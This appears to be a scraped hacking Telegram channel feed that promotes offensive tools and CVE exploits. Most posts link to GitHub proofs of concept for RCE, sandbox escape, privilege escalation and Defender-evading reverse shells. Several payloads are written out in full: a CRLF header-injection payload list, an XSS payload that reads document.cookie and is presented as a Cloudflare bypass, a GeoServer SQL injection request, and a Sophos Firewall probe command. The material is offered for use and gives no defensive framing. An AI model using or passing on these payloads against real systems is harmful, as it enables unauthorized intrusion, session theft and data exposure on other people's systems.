به دست آوردن ip پشت cloudflare با ابزار CloakQuest3r
Github
#tools #cloudflare #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#tools #cloudflare #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - rvizx/CVE-2023-30547: PoC Exploit for VM2 Sandbox Escape Vulnerability
PoC Exploit for VM2 Sandbox Escape Vulnerability. Contribute to rvizx/CVE-2023-30547 development by creating an account on GitHub.
GDorks - Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories )
Github
#dork
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#dork
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - Ishanoshada/GDorks: Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories )
Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories ) - GitHub - Ishanoshada/GDorks: Google Dork List - Uncover the Hidden Gems of the Internet ( There ...
Nim Shell - Reverse shell that can bypass windows defender detection
Github
#bypass #windows #shell
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#bypass #windows #shell
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-49070 - Pre-auth RCE in Apache Ofbiz 18.12.09
Github
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC
Contribute to abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC development by creating an account on GitHub.
photo location finder - This program allows the user to detect landmarks in an image using the Google Cloud Vision API.
Github
#osint
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#osint
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - PierrunoYT/photo-location-finder: This program allows the user to detect landmarks in an image using the Google Cloud…
This program allows the user to detect landmarks in an image using the Google Cloud Vision API. The program prompts the user for the image path, API key, and credentials to authenticate with the Go...
PoC for CVE-2023-50164 - Proof of Concept for Path Traversal in Apache Struts
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - dwisiswant0/cve-2023-50164-poc: Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")
Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164") - dwisiswant0/cve-2023-50164-poc
CVE-2023-41772 - UIFuckUp exploit to gain system privileges as user on Windows 10 (1809 and up) and 11
Github
#CVE #Exploit #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - R41N3RZUF477/CVE-2023-41772
Contribute to R41N3RZUF477/CVE-2023-41772 development by creating an account on GitHub.
CRLF Injection Payloads
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
%0AHeader-Test:Bug
%0A%20Header-Test:Bug
%20%0AHeader-Test:Bug
%23%OAHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
%3F%0AHeader-Test:Bug
crlf%0AHeader-Test:Bug
crlf%0A%20Header-Test:Bug
crlf%20%0AHeader-Test:Bug
crlf%23%OAHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
crlf%3F%0AHeader-Test:Bug
%0DHeader-Test:Bug
%0D%20Header-Test:Bug
%20%0DHeader-Test:Bug
%23%0DHeader-Test:Bug
%23%0AHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
%3F%0DHeader-Test:Bug
crlf%0DHeader-Test:Bug
crlf%0D%20Header-Test:Bug
crlf%20%0DHeader-Test:Bug
crlf%23%0DHeader-Test:Bug
crlf%23%0AHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
crlf%3F%0DHeader-Test:Bug
%0D%0AHeader-Test:Bug
%0D%0A%20Header-Test:Bug
%20%0D%0AHeader-Test:Bug
%23%0D%0AHeader-Test:Bug
\r\nHeader-Test:Bug
\r\n Header-Test:Bug
\r\n Header-Test:Bug
%5cr%5cnHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
%3F%0D%0AHeader-Test:Bug
crlf%0D%0AHeader-Test:Bug
crlf%0D%0A%20Header-Test:Bug
crlf%20%0D%0AHeader-Test:Bug
crlf%23%0D%0AHeader-Test:Bug
crlf\r\nHeader-Test:Bug
crlf%5cr%5cnHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
crlf%3F%0D%0AHeader-Test:Bug
%0D%0A%09Header-Test:Bug
crlf%0D%0A%09Header-Test:Bug
%250AHeader-Test:Bug
%25250AHeader-Test:Bug
%%0A0AHeader-Test:Bug
%25%30AHeader-Test:Bug
%25%30%61Header-Test:Bug
%u000AHeader-Test:Bug
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:Bug
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:Bug
/google.com/%2F..%0D%0AHeader-Test:Bug
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Cloudflare XSS Bypass for reflected XSS ⚡️
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<svg%20oNinad=1%20onload=alert(document.cookie)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-46589 Apache Tomcat - Request Smuggling
Read
#CVE #Apache
——————
0Day.Today
@LearnExploit
@Tech_Army
Read
#CVE #Apache
——————
0Day.Today
@LearnExploit
@Tech_Army
HackerOne
Internet Bug Bounty disclosed on HackerOne: Possibility of Request...
CVE-2023-46589 Apache Tomcat - Request Smuggling
Severity: Important
Description:
Tomcat did not correctly parse HTTP trailer headers. A specially crafted
trailer header that exceeded the header...
Severity: Important
Description:
Tomcat did not correctly parse HTTP trailer headers. A specially crafted
trailer header that exceeded the header...
CVE-2023-50254 PoC Exploit for Deepin-reader RCE
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25157
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-51385 - OpenSSH OS command injection vulnerability
Link
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Vin01’s Blog
SSH ProxyCommand == unexpected code execution (CVE-2023-51385)
Summary
CVE-2022-1040 - RCE in Sophos Firewall
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"x":"test"\}' | grep -q 'Session Expired'
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army